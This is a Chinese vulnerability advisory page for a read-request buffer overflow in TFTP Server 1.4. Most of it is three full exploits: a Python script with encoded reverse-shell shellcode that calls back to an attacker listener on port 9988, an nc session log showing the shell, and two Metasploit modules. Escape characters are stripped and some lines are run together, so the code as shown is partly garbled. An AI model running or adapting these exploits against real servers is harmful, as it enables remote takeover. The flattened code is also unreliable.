发布日期:2012-01-11
更新日期:2012-05-16受影响系统:
sourceforge tftp-server 1.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51364TFTP Server是用于PXEBOOT的免费多线程TFTP服务器。TFTP Server 1.4在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。<*来源:b33f
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!b33f ()提供了如下测试方法:
http://www.securityfocus.com/data/vulnerabilities/exploits/51364.py
http://www.securityfocus.com/data/vulnerabilities/exploits/51364.rb
http://www.securityfocus.com/data/vulnerabilities/exploits/51364-2.rb#!/usr/bin/python#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise... #
# #
# This tftp service have been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/5314/ #
# (2) Molotov ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/10542/ #
# (3) tixxDZ ==> ERROR Overflow #
# http://www.exploit-db.com/exploits/5563/ #
# #
# Vulnerable software: #
# http://www.exploit-db.com/application/5314/ #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read #
# Request (RRQ) packet can also trigger a buffer overflow... #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear #
# as expected.... #
# #
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:Program FilesTFTPServer> #
#---------------------------------------------------------------------------#import socket
import syshost = "192.168.111.128"
port = 69try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b "x00"
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
shell = (
"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
"xafx96x42xdfxddx87x26xdfx72xa7x62")#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR #
# => 3-byte overwrite using the mandatory protocol null-byte. #
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump. #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer. #
# (4) Stage4: reverse shell port 9988 - size 341 #
#---------------------------------------------------------------------------#stage4 = "x90"*50 + shell
stage3 = "xE9x2ExFAxFFxFF"
stage2 = "xEBxF9x90x90"
stage1 = "x05x96x40"filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
mode = "netascii"
youlose = "x00x01" + filename + "x00" + mode + "x00"
s.sendto(youlose, (host, port))1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /" __ /"__` / \__ /"__` 0
0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1
1 /_/ /" _ ` / /_/_\_<_ /"___ / /`"__ 0
0 / / / / \__/ \_ \_ / 1
1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1 \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I"m KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1###
# Title : TFTP SERVER v1.4 (RRQ) Remote Root BOF Exploit (MSF)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : windows (Remote)
# Type : Remote r00t & Buffer Ov3rfl0w
# Tested on : winXP sp3 (en)
#####
# I"m BaCk fr0m OURHOUD ^__^ .. I m!Ss tHe Explo!tInG <3 <3 ^_*
####
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
####
# $Id: tftp14rrq_bof.rb | 2012-01-15 | 00:01 | KedAns-Dz $
##require "msf/core"class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking include Msf::Exploit::Remote::Ftp def initialize(info = {})
super(update_info(info,
"Name" => "TFTP SERVER v1.4 (RRQ) Remote Root BOF Exploit",
"Description" => %q{
This module exploits a After some simple fuzzing with spike I discovered that sending a Read
Request (RRQ) packet can also trigger a buffer overflow
},
"Author" => [
"KedAns-Dz <ked-h[at]hotmail.com>", # t0 MSF
],
"License" => MSF_LICENSE,
"Version" => "$Revision: 0.1",
"References" =>
[
[ "URL", "http://1337day.com/exploits/17361" ], # by b33f
[ "URL", "http://www.exploit-db.com/exploits/10542" ], # by Molotov
],
"DefaultOptions" =>
{
"EXITFUNC" => "process",
},
"Payload" =>
{
"BadChars" => "x00x0d",
},
"Platform" => "win",
"Targets" =>
[
[ "TFTP SERVER v1.4 (Windows XP-SP3 / netascii mod)",
{
"Ret" => 0x00409605, # ppr (from TFTPServer.exe)
"Offset" => 93,
"Mode" => "netascii"
}
], ],
"DefaultTarget" => 0))
end
def check
connect
disconnect if (banner =~ /TFTP SERVER v1.4/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end def exploit
connect_login print_status("Trying target #{target.name}...") buf = make_nops(target["Offset"]) # Nop"s
buf << payload.encoded
buf << "x41" * 1487
buf << "xE9x2ExFAxFFxFF" # jump back
buf << "xEBxF9x90x90" # jump back 5-bytes
buf << [target.ret].pack("V")
buf << make_nops(18) # Padding
dz = "x00x01"
dz << buf
dz << "x00"
dz << [target["Mode"]
dz << "x00"
send_cmd(dz, false ) handler
disconnect
end
end#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================require "msf/core"class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking include Msf::Exploit::Remote::Udp def initialize(info = {})
super(update_info(info,
"Name" => "TFTP server 1.4 ST(RRQ) Buffer overflow",
"Description" => %q{
This exploit creats buffer overflow by sending a Read Request (RRQ) packet can also trigger a buffer overflow...
},
"Author" => "JK and b33f",
"Version" => "",
"References" =>
[
["URL", "http://securtyresearch.in/"],
["URL",""]
],
"DefaultOptions" =>
{
"EXITFUNC" => "thread",
},
"Payload" =>
{
"Space" => 500,
"BadChars" => "x00",
},
"Platform" => "win",
"Targets" =>
[
[ "TFTP server v1.4 Windows XP SP3", { "Ret" => 0x00409605 } ],
[ "TFTP server v1.4 Windows XP SP0", { "Ret" => 0x00418000 } ]
],
"Privileged" => true,
"DefaultTarget" => 0,
"DisclosureDate" => "Apr 12 2012")) register_options([Opt::RPORT(69)], self.class)
end def exploit
connect_udp
stage ="x00x01"
stage << make_nops(50) + payload.encoded
stage << rand_text_alpha(1487 - (payload.encoded.length+50))
stage << "xE9x2ExFAxFFxFF"
stage << "xEBxF9x90x90"
stage << [target.ret].pack("V")
stage <<"x00"
stage << "netascii"
stage << "x00"
#youlose = "x00x01" + filename + "x00"
udp_sock.put(stage)
disconnect_udp
endend建议:
--------------------------------------------------------------------------------
厂商补丁:sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://jocr.sourceforge.net/index.htmlHitachi IT Operations Director跨站脚本执行和拒绝服务漏洞Cisco IOS XR 3.8至4.1版本NETIO和IPV4_IO进程拒绝服务漏洞相关资讯 溢出漏洞 缓冲区溢出漏洞
- 波音787发电机控制单元整数溢出漏 (05/04/2015 18:47:00)
- Siemens WinCC RegReader ActiveX (03/24/2013 08:07:04)
- Novell Messenger / Groupwise (03/18/2013 20:58:20)
| - Novell iPrint Client 缓冲区溢出 (05/04/2013 07:13:08)
- Siemens WinCC CCEServer缓冲区溢 (03/22/2013 19:25:09)
- EMC AlphaStor DCP缓冲区溢出漏洞 (02/05/2013 09:14:34)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站